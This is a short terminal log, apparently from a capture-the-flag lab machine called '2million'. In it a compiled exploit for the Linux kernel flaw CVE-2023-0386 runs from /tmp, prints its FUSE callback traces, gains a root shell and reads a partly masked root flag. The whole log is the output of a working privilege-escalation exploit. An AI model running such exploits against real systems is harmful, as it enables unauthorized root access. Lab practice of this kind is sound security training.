admin@2million:/tmp/CVE-2023-0386$ [+] len of gc: 0x3ee0
./exp
uid:1000 gid:1000
[+] mount success
[+] readdir
[+] getattr_callback
/file
total 8
drwxrwxr-x 1 root   root     4096 Jun 27 00:08 .
drwxrwxr-x 6 root   root     4096 Jun 27 00:08 ..
-rwsrwxrwx 1 nobody nogroup 16096 Jan  1  1970 file
[+] open_callback
/file
[+] read buf callback
offset 0
size 16384
path /file
[+] open_callback
/file
[+] open_callback
/file
[+] ioctl callback
path /file
cmd 0x80086601
[+] exploit success!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@2million:/tmp/CVE-2023-0386# cd /root
root@2million:/root# ls
root.txt  snap  thank_you.json
root@2million:/root# cat root.txt
6916************************b789
